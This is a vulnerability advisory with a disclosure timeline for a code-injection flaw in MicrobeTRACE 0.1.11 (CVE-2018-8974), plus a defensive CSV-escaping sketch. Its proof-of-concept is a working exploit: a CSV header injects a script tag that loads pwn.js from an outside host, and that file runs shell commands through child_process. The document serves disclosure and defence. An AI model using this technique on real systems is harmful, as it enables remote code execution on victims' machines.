Description
MicrobeTRACE 0.1.11 allows remote attackers to execute arbitrary code, related to code injection via specially crafted CSV files.
Vulnerability Type
Inclusion of Functionality from Untrusted Control Sphere (CWE-829)
Vendor of Product
Centers for Disease Control and Prevention Surveillance Strategy (CDCgov)
Affected Product Code Base
MicrobeTRACE 0.1.11
Affected Component
| Component | Version | Hash |
|---|---|---|
| MicrobeTRACE.exe | 0.1.11 | 997e33089165286a364dc543174dc232 |
Attack Type
Remote
Impact Code execution
true
Attack Vectors
Attackers can exploit this vulnerability by creating a specially crafted CSV file that, once loaded, injects and executes server-side code.
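A defensive sketch of the input handling this advisory calls for, added here as an example (it is not MicrobeTRACE's code or the vendor's fix): CSV cells are flagged when they contain tag-like markup and are HTML-escaped before being placed in a page. The function names, the one-record-per-line assumption and the sample CSV with `host.invalid` are constructed for illustration.

```javascript
// Added example (not MicrobeTRACE code): treat CSV cells as data, never as markup.
// All function names here are hypothetical.

// Escape the five characters that let text break out into HTML markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Minimal CSV line splitter; a quote opens a quoted field only at field start.
function splitCsvLine(line) {
  const cells = [];
  let cur = '';
  let quoted = false;
  for (let i = 0; i < line.length; i++) {
    const ch = line[i];
    if (quoted) {
      if (ch === '"' && line[i + 1] === '"') { cur += '"'; i++; }
      else if (ch === '"') quoted = false;
      else cur += ch;
    } else if (ch === '"' && cur === '') quoted = true;
    else if (ch === ',') { cells.push(cur); cur = ''; }
    else cur += ch;
  }
  cells.push(cur);
  return cells;
}

// Report every cell that contains something shaped like an HTML tag.
function findMarkupCells(csvText) {
  const hits = [];
  csvText.split(/\r?\n/).forEach((line, row) => {
    splitCsvLine(line).forEach((cell, col) => {
      if (/<\s*\/?\s*[a-zA-Z!]/.test(cell)) hits.push({ row, col, cell });
    });
  });
  return hits;
}

// Build a table header row with every cell HTML-escaped.
function renderHeaderRow(cells) {
  return '<tr>' + cells.map((c) => `<th>${escapeHtml(c)}</th>`).join('') + '</tr>';
}

// Constructed sample input: header cell carries markup, data row is benign.
const SAMPLE_CSV = [
  'Source<script src="http://host.invalid/x.js"></script>,Target,Weight,distance',
  '1807,1311,1,0.013987',
].join('\n');
```

An importer can reject the file when `findMarkupCells` returns any hits, and should still escape on output so that a missed pattern is rendered as text rather than parsed as HTML.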
Reference
Product Website
Product Download
Discoverer
West Shepherd
wshepherd0010[at]gmail.com
Advisory ID
CVE-2018-8974
Report Timeline
| Date | Action |
|---|---|
| 3/23/2018 | Discovered vulnerability, contacted vendor, requested CVE. |
| 3/23/2018 | Vendor replied, working on fix. |
| 3/27/2018 | Vendor published fix for 0.1.11. |
| 4/24/2018 | Released details to public. |
PoC
```javascript
/*
# Exploit Title: MicrobeTRACE 0.1.11 - Code Injection
# Google Dork: N/A
# Date: 4/24/2018
# Exploit Author: West Shepherd
# Vendor Homepage: https://github.com/CDCgov/MicrobeTRACE
# Software Link: https://github.com/CDCgov/MicrobeTRACE/releases/tag/v0.1.11
# Version: 0.1.11
# Tested on: Windows 7 x86-x64
# CVE : CVE-2018-8974.
*/

/*
Steps to reproduce:
1.) create pwn.js
2.) create exploit.csv
3.) run "python -m SimpleHTTPServer 80"
4.) load exploit.csv with MicrobeTRACE
*/

// contents of pwn.js
const exec = require('child_process').exec;

function os_func() {
    this.execCommand = function(cmd, callback) {
        exec(cmd, (error, stdout, stderr) => {
            if (error) {
                alert('exec error:' + error);
                return;
            }
            callback(stdout);
        });
    }
}

var os = new os_func();
os.execCommand('whoami', function (returnvalue) {
    alert(returnvalue + ' has been pwned.');
});

// contents of exploit.csv (for 0.1.11)
/*
Source<script type="text/javascript" src="http://172.26.61.131/pwn.js"></script>,Target,Weight,distance
1807,1311,1,0.013987
1518,1311,15,0.013985
1481,1311,26,0.01398
1480,1311,12,0.01398
1422,1311,24,0.013978
*/
```
PGP
Contact West Shepherd wshepherd0010[at]gmail.com